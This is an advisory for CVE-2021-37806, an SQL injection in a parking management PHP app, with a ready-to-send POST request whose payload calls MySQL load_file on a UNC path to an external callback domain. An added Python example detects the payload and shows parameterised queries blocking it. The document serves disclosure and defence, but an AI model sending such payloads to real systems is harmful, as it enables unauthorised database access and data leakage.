CVE-2021-37806

Vendor

Software

On working

Description:

The catename parameter of the Vehicle Parking Management System app, affected version 1.0, appears to be vulnerable to SQL injection (type: time-based blind). The payload '+(select load_file('\\ma0xscj8wyb2gd8sai9pcyvl7cd51xvlmoagx6lv.nu11secur1ty.net\hgt'))+' was submitted in the catename parameter. This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path pointing at a host on an external domain. The application interacted with that domain, indicating that the injected SQL query was executed.

Request (HTTP, carrying the SQL payload)

```http
POST /Vehicle%20parking%20management%20System%20project/vpms/add-category.php HTTP/1.1
Host: 192.168.1.2
Origin: http://192.168.1.2
Cookie: PHPSESSID=1earei5r7uisqidmakmk0es5ju
Upgrade-Insecure-Requests: 1
Referer: http://192.168.1.2/Vehicle%20parking%20management%20System%20project/vpms/add-category.php
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH7En2PBJTRM5v1Yq
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Length: 241

------WebKitFormBoundaryH7En2PBJTRM5v1Yq
Content-Disposition: form-data; name="catename"

277509'+(select load_file('\\\\ma0xscj8wyb2gd8sai9pcyvl7cd51xvlmoagx6lv.nu11secur1ty.net\\hgt'))+'
------WebKitFormBoundaryH7En2PBJTRM5v1Yq
Content-Disposition: form-data; name="submit"

..e
------WebKitFormBoundaryH7En2PBJTRM5v1Yq--
```

Response (HTTP)

```http
HTTP/1.1 200 OK
Date: Sat, 30 Oct 2021 20:06:14 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.4.24
X-Powered-By: PHP/7.4.24
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 9928

<!doctype html>
<html class="no-js" lang="">
<head>

<title>VPMS - Add Category</title>


<link rel="apple-touch-icon" href="https://i.imgur.com/QRAUqs9.png">
<link rel="sho
...[SNIP]...
```
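The following Python code is an added example, not part of the advisory or of the VPMS project. It shows two things a defender takes from the request above: how to pull the catename field out of a multipart body and flag the injection indicators it carries (a quote that closes the original string literal followed by an operator, a sub-select, a load_file call, a UNC path), and why parameterised queries stop the payload from being evaluated. The multipart body is a constructed copy of the advisory's request with a placeholder callback hostname; the SQLite probe string uses `||` because SQLite concatenates strings with `||` rather than MySQL's `+`, and SQLite has no load_file function, so it only demonstrates the sub-query being evaluated, not the out-of-band file read.

```python
import re
import sqlite3

# Constructed sample: same shape as the advisory's multipart body, with the
# external callback hostname replaced by a placeholder (attacker-callback.example).
BOUNDARY = "----WebKitFormBoundaryH7En2PBJTRM5v1Yq"
SAMPLE_BODY = "\r\n".join([
    "--" + BOUNDARY,
    'Content-Disposition: form-data; name="catename"',
    "",
    "277509'+(select load_file('\\\\\\\\attacker-callback.example\\\\hgt'))+'",
    "--" + BOUNDARY,
    'Content-Disposition: form-data; name="submit"',
    "",
    "Add",  # constructed submit value; the advisory's value is truncated
    "--" + BOUNDARY + "--",
    "",
])

# SQLite-flavoured probe with the same structure as the advisory's payload:
# close the string literal, evaluate a sub-query, reopen the literal.
SQLITE_PROBE = "277509'||(select 'INJECTED')||'"


def parse_multipart(body: str, boundary: str) -> dict:
    """Minimal multipart/form-data parser for plain text fields (no file parts)."""
    fields = {}
    for part in body.split("--" + boundary):
        part = part.strip("\r\n")
        if not part or part == "--":          # preamble or closing delimiter
            continue
        headers, _, value = part.partition("\r\n\r\n")
        name = re.search(r'name="([^"]+)"', headers)
        if name:
            fields[name.group(1)] = value
    return fields


# Each indicator is (label, predicate over the raw field value).
SQLI_INDICATORS = [
    # a quote that closes the literal, then + or ||, then an opening paren
    ("quote-breakout", lambda v: re.search(r"'\s*(\+|\|\|)\s*\(", v) is not None),
    ("subselect", lambda v: re.search(r"\(\s*select\b", v, re.I) is not None),
    ("mysql-file-read", lambda v: re.search(r"load_file\s*\(", v, re.I) is not None),
    # two backslashes, a hostname, another backslash: UNC share path
    ("unc-path", lambda v: re.search(r"\\\\[\w.-]+\\", v) is not None),
]


def sqli_indicators(value: str) -> list:
    """Return the labels of every indicator that fires on the given field value."""
    return [label for label, check in SQLI_INDICATORS if check(value)]


def store_category(catename: str, safe: bool) -> str:
    """Insert catename either by string concatenation (the vulnerable pattern)
    or with a bound parameter, and return what the database actually stored."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE category (catename TEXT)")
    if safe:
        # Bound parameter: the value is data, never parsed as SQL.
        db.execute("INSERT INTO category (catename) VALUES (?)", (catename,))
    else:
        # Concatenation: the quote in the value ends the literal and the
        # sub-query runs as part of the statement.
        db.execute("INSERT INTO category (catename) VALUES ('" + catename + "')")
    return db.execute("SELECT catename FROM category").fetchone()[0]


if __name__ == "__main__":
    fields = parse_multipart(SAMPLE_BODY, BOUNDARY)
    print("catename indicators:", sqli_indicators(fields["catename"]))
    print("concatenated query stored:", store_category(SQLITE_PROBE, safe=False))
    print("parameterised query stored:", store_category(SQLITE_PROBE, safe=True))
```

Run against the sample body, the catename field trips all four indicators while an ordinary category name trips none; the concatenated insert stores `277509INJECTED` (the sub-query was evaluated), whereas the parameterised insert stores the probe string verbatim.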

Reproduce:


Proof:
